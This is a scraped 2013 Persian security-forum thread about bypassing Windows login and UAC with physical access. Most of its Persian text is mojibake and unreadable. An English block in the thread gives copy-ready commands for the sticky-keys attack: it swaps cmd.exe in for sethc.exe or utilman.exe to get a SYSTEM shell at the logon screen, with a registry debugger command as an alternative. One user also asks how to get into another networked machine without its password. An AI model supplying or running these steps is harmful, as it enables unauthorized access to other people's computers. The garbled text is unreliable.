Ø§Ø·Ù„Ø§Ø¹ÛŒÙ‡

**Warden** · 12-15-2013, 01:58 PM

Ø¨Ø§ ØªØ´Ú©Ø± Ø§Ø² Ù…Ø³Ù„Ù… Ø¹Ø²ÛŒØ².

Ø±Ø§Ù‡ÛŒ Ù‡Ø³Øª Ø¬Ù„ÙˆÛŒ Ø§ÛŒÙ† Ú†Ù†Ø¯ Ø¨Ø§Ø± Ø´ÛŒÙØª Ø²Ø¯Ù† Ø±Ùˆ Ú¯Ø±ÙØª ØŸ
ØªÙˆ Ø¨Ø¹Ø¶ÛŒ Ø§Ø² Ø³ÛŒØ³ØªÙ… Ù‡Ø§ Ú†Ù†Ø¯ Ø¨Ø§Ø± Ø´ÛŒÙØª Ø±Ùˆ Ú©Ù‡ Ù…ÛŒØ²Ù†Ù… Ø¨Ø§Ù„Ø§ Ù†Ù…ÛŒØ§Ø¯ ÙˆÙ„ÛŒ ØªÙˆ Ø¨Ø¹Ø¶ÛŒØ§ Ø¯ÛŒÚ¯Ù‡ Ù…Ø´Ú©Ù„ Ù†Ø¯Ø§Ø±Ù‡

Ø¯Ù„ÛŒÙ„Ø´ Ú†ÛŒ Ù…ÛŒØªÙˆÙ†Ù‡ Ø¨Ø§Ø´Ù‡ ØŸ

**l4tr0d3ctism** · 12-15-2013, 02:58 PM

Ø¨Ù„Ù‡ Ù…ÛŒØ´Ù‡ Ú©Ù‡ ØªÙˆ control panel Ú¯Ø²ÛŒÙ†Ù‡ ÛŒ Ease of Access Center Ùˆ Ø¨Ø¹Ø¯ Ú¯Ø²ÛŒÙ†Ù‡ ÛŒ Ùˆ Ø¨Ø¹Ø¯ Make the keyboard easier to use Ùˆ Ø¨Ø¹Ø¯Ø´Ù… Set up Sticky Keys Ø±Ùˆ Ø§Ù†ØªØ®Ø§Ø¨ Ú©Ù†ÛŒØ¯

Ø§ÙˆÙ†Ø¬Ø§ Ú¯Ø²ÛŒÙ†Ù‡ Ø§ÛŒ Ù‡Ø³Øª Ú©Ù‡ Ú¯ÙØªÙ‡ turn on stiky key when shift SHIFT is pressed Five time ØªÛŒÚ©Ø´ Ø±Ùˆ Ø¨Ø±Ø¯Ø§Ø±ÛŒ Ø¯ÛŒÚ¯Ù‡ Ø¨Ø§Ù„Ø§ Ù†Ù…ÛŒØ§Ø¯

ÙˆÙ„ÛŒ Ù‡Ù…ÙˆÙ† Ø·ÙˆØ± Ú©Ù‡ Ú¯ÙØªÙ… Ù…ÛŒØ´Ù‡ Ú©Ù‡ Ø¨Ù‡ Ø¬Ø§ÛŒ SETHC Ø§Ø² OSK Ùˆ ... Ø§Ø³ØªÙØ§Ø¯Ù‡ Ú©Ø±Ø¯

Ø§ÛŒÙ†Ø¬Ø§ ØªÙˆØ¶ÛŒØØ§Øª Ø±Ùˆ ØªÙˆ Ø§ÛŒÙ† Ú©ØªØ§Ø¨ Ù†ÙˆØ´ØªÙ… 2 Ø³Ø§Ù„ Ù¾ÛŒØ´ Ù†ÙˆØ´ØªÙ… ÙÚ©Ø± Ú©Ù†Ù…

http://www.shabgard.org/forums/showthread.php?25282

Ø¨Ø±Ø§ÛŒ Ø¬Ù„ÙˆÚ¯ÛŒØ±ÛŒ Ø§Ø² Ø§ÛŒÙ† Ù†ÙˆØ¹ ØÙ…Ù„Ø§Øª Ø¨Ù‡ØªØ±ÛŒÙ† Ú©Ø§Ø± Ø§Ù¾Ø¯ÛŒØª Ù…Ø§Ø¯Ø± Ø¨ÙˆØ±Ø¯ Ùˆ Ù‚ÙÙ„ Ú¯Ø²Ø§Ø±ÛŒ Ø±ÙˆÛŒ Ø§ÙˆÙ† Ù‡Ø³Øª Ú©Ù‡ Ú©Ø³ÛŒ Ù†ØªÙˆÙ†Ù‡ Ø¨ÙˆØª Ú©Ù†Ù‡ Ø¨ÛŒØ§Ø¯ Ø¨Ø§Ù„Ø§

ÙˆÙ„ÛŒ Ø§Ú¯Ù‡ Ú©ÛŒØ³ Ù‚ÙÙ„ Ø¨Ø§Ø´Ù‡ Ú©Ø³ÛŒ Ù†ØªÙˆÙ†Ù‡ Ú©ÛŒØ³ Ø±Ùˆ Ø¨Ø§Ø² Ú©Ù†Ù‡ Ùˆ Ø¨Ø§ØªØ±ÛŒ Ø±Ùˆ Ø®Ø§Ù„ÛŒ Ú©Ù†Ù‡ Ø®ÙˆØ¨ ØªÙˆ Ø§Ù¾Ø¯ÛŒØª Ù‡Ø§ÛŒ Ø¬Ø¯ÛŒØ¯ Ù…Ù† Ø±ÙˆØ´ÛŒ Ø¨Ø±Ø§ÛŒ Ø´Ú©Ø³ØªÙ†Ø´ Ù†Ø¯Ø§Ø±Ù…

Ø¯ÙˆØ³ØªØ§Ù† Ø¯ÛŒÚ¯Ù‡ Ø§Ú¯Ù‡ Ø¯Ø§Ø±Ù† share Ú©Ù†Ù† Ø±ÙˆØ´ Ø±Ùˆ

**keylogger** · 12-15-2013, 04:11 PM

Ù…Ø³Ù„Ù… Ø§Ù‚Ø§ Ø§ÙˆÙ† ØØ±Ú©Øª Ø±Ø¯ÛŒÙ Ú©Ù† Ú¯ÛŒØ±Ù… :d

**Relative Code** · 12-16-2013, 04:39 AM

Ù…Ù…Ù†ÙˆÙ†Ù… Ø§Ø² Ø¢Ù…ÙˆØ²Ø´ Ø®ÙˆØ¨ØªÙˆÙ†

ØØ§Ù„Ø§ Ú©Ù‡ Ø§ÛŒÙ† Ù…Ø·Ø±Ø Ú©Ø±Ø¯ÛŒÙ† Ù…Ù† Ù‡Ù… ÛŒÚ© Ø³ÙˆØ§Ù„ Ø¯Ø§Ø´ØªÙ…ØŒ Ú©Ù… Ùˆ Ø¨ÛŒØ´ Ø¯Ø± Ù‡Ù…ÛŒÙ† Ø¶Ù…ÛŒÙ†Ù‡ Ø§Ú¯Ø± ØªÙˆÛŒ ÛŒÚ© Ø´Ø¨Ú©Ù‡ Local Ù…ÙˆÙ‚Ø¹ windows discovery network ÛŒÚ© Ú©Ù„Ø§ÛŒÙ†Øª Ø¯ÛŒÚ¯Ù‡ Ø¨Ø§Ø´Ù‡ Ùˆ Ø¨Ø±Ø§ÛŒ ÙˆØ±ÙˆØ¯ Ø¨Ù‡ Ø³ÛŒØ³ØªÙ… Ø§ÙˆÙ† Ø§Ø² Ø´Ù…Ø§ Ù†Ø§Ù… Ú©Ø§Ø±Ø¨Ø±ÛŒ Ùˆ Ø±Ù…Ø² Ø¹Ø¨ÙˆØ± Ø¨Ø®ÙˆØ§Ø¯ØŒ Ø¨Ø±Ø§ÛŒ Ø¯ÙˆØ± Ø²Ø¯Ù† Ú†ÛŒÚ©Ø§Ø± Ù…ÛŒ Ø´Ù‡ Ú©Ø±Ø¯ØŸ

Ù…Ù…Ù†ÙˆÙ† Ù…ÛŒ Ø´Ù… Ø¯Ø± Ø§ÛŒÙ† Ù…ÙˆØ±Ø¯ Ø±Ø§Ù‡Ù†Ù…Ø§ÛŒÛŒ Ø¯Ù‚ÛŒÙ‚ Ú©Ù†ÛŒØ¯.

Capture.JPG

**l4tr0d3ctism** · 12-16-2013, 10:52 AM

**Digury** · 12-25-2013, 04:53 AM

ØµØ±ÙØ§ Ø¬Ù‡Øª ...

Ø§Ø² ÙÛŒÙ‡Ø§ Ø®Ø§Ù„Ø¯ÙˆÙ† Ø¢Ø±Ø´ÛŒÙˆ Ø¨Ø§ Ø²Ø¨Ø§Ù† Ø´ÛŒØ±ÛŒÙ† Ø§Ù†Ú¯Ù„ÛŒØ³ÛŒ ( Ø¨Ù‡ Ø±ÙˆØ´ Ø®ÙˆØ¯Ù… ... )

Ú©Ø¯:

[LEFT]I.T.N.O.G
---------
: Privilege Escalation via "Sticky" Keys

You can gain a SYSTEM shell on an application you have administrative access on  or if you have physical access to the box and can boot to repair disk or linux distro and can change files.
We Can Use Sticky Keys With "Sethc.exe" Or "Utilman.exe"

1) Make A Copy Somewhere Of The Original On System sethc.exe

   : copy c:\windows\system32\sethc.exe c:\
   : cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

2) Copy cmd.exe into Sethc.exe's place  (1)

   : copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
   : cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

3) Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing ...

*) Same goes for Utilman.exe 
   Utilman.exe can be launched via Ctrl + U or the Accessibility button on Vista+'s logon screen.

*) One thing about sticky keys in that some machines / users have disabled the Shift key five times 
   keyboard shortut
   
   You can also use Left Alt + Left Shift + Print Screen to launch sethc.exe
 
Finish ./

------------------------------------------------------
(1)
You can also achieve same results by setting executable of your choice as Debugger to sethc.exe under Image File Execution options in registry. So in a priv command shell, it would be

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
[/LEFT]

**l4tr0d3ctism** · 12-25-2013, 05:33 AM

Ù‡Ø± Ø¯Ùˆ Ø¨ØØ« Ø¯Ø±Ø³ØªÙ‡ ÙˆÙ„ÛŒ Ù‡ÛŒÚ† Ú©Ø¯ÙˆÙ… Ù…Ù†Ø¬Ø±Ø¨ Ø¨Ù‡ ØºÛŒØ± ÙØ¹Ø§Ù„ Ú©Ø±Ø¯Ù† UAc Ù†Ù…ÛŒØ´Ù‡

Ø¨Ø§ÛŒØ¯ Ø¨Ø¹Ø¯ Ø¬Ø§ÛŒÚ¯Ø²ÛŒÙ† Ú©Ø±Ø¯Ù† ÙˆØ§Ø±Ø¯ Ù…Ø³ÛŒØ±ÛŒ Ú©Ù‡ Ø¨Ø§Ù„Ø§ Ú¯ÙØªÙ… Ø¨Ø´ÛŒÙ… Ùˆ Ø§ÙˆÙ† 2 Ù…Ù‚Ø¯Ø§Ø± Ø±Ùˆ ØØ±Ù Ú©Ù†ÛŒÙ…

Ø¯ÙˆÙ…ÛŒÙ† Ù‡Ù… Ú©Ù‡ Ù‡Ù…ÙˆÙ† Ø¨ØØ« Ø²ÛŒØ±Ù‡ Ú©Ù‡ Ú©Ø§Ù…Ù„ Ø¢Ø³ÛŒØ¨ Ù¾Ø°ÛŒØ±ÛŒ Ø±Ùˆ Ú¯ÙØªÛŒÙ…

http://www.shabgard.org/forums/showthread.php?28451

Ù‡Ø³Øª Ú©Ù‡ Ú©Ø§Ù…Ù„ Ø¯Ø± Ø§ÛŒÙ† Ù¾Ø³Øª Ú©Ù‡ Ù…Ø¹Ø±ÙÛŒ Ú©Ø±Ø¯Ù… Ú¯ÙØªÛŒÙ… ÙˆÙ„ÛŒ Ø§ÛŒÙ† ÛŒÚ©ÛŒ Ù†Ù…ÛŒ ØªÙˆÙ†Ù‡ UAC Ø±Ùˆ ØºÛŒØ± ÙØ¹Ø§Ù„ Ú©Ù†Ù‡ Ø§Ú¯Ù‡ Ù‚Ø¨Ù„Ø´ UAC ÙØ¹Ø§Ù„ Ø¨Ø§Ø´Ù‡

===========

Ù…Ù…Ù†ÙˆÙ†

Ø§Ø·Ù„Ø§Ø¹ÛŒÙ‡

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Ø§Ø·Ù„Ø§Ø¹ÛŒÙ‡

Ø¢Ù…ÙˆØ²Ø´ Ø´Ú©Ø³ØªÙ† uac ÙˆÛŒÙ†Ø¯ÙˆØ² Ø¯Ø± Ø¯Ø³ØªØ±Ø³ÛŒ Ù‡Ø§ÛŒ ÙÛŒØ²ÛŒÚ©ÛŒ

Ø¢Ù…ÙˆØ²Ø´ Ø´Ú©Ø³ØªÙ† uac ÙˆÛŒÙ†Ø¯ÙˆØ² Ø¯Ø± Ø¯Ø³ØªØ±Ø³ÛŒ Ù‡Ø§ÛŒ ÙÛŒØ²ÛŒÚ©ÛŒ

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Ø¢Ù…ÙˆØ²Ø´ Ø´Ú©Ø³ØªÙ† uac ÙˆÛŒÙ†Ø¯ÙˆØ² Ø¯Ø± Ø¯Ø³ØªØ±Ø³ÛŒ Ù‡Ø§ÛŒ ÙÛŒØ²ÛŒÚ©ÛŒ

Ø¢Ù…ÙˆØ²Ø´ Ø´Ú©Ø³ØªÙ† uac ÙˆÛŒÙ†Ø¯ÙˆØ² Ø¯Ø± Ø¯Ø³ØªØ±Ø³ÛŒ Ù‡Ø§ÛŒ ÙÛŒØ²ÛŒÚ©ÛŒ